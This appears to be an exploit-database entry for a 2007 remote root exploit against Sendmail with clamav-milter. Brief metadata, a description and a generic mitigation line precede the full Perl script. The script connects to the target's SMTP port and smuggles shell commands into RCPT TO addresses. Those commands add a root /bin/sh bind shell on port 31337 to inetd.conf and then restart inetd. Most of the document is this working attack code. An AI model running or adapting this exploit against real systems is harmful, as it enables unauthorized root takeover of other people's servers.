black-hole.pl

vendor:

Sendmail with clamav-milter

by:

Eliteboy

CVSS

CRITICAL

Remote Root Exploit

CWE

Product Name: Sendmail with clamav-milter

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Sendmail w/ clamav-milter Remote Root Exploit allows an attacker to gain remote root access to the target system. By sending specific commands to the target's Sendmail service, the attacker can execute arbitrary commands with root privileges.

Mitigation:

To mitigate this vulnerability, it is recommended to update Sendmail and clamav-milter to their latest versions. Additionally, network-level controls, such as firewalls, can be implemented to restrict access to the affected services.

Source

Exploit-DB raw data:

### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";

if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}

print "Attacking $ARGV[0]...\n";

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

print $sock "ehlo you\r\n";
print $sock "mail from: <>\r\n";
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";
print $sock "rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n";
print $sock "data\r\n.\r\nquit\r\n";

while (<$sock>) {
        print;
}

# milw0rm.com [2007-12-21]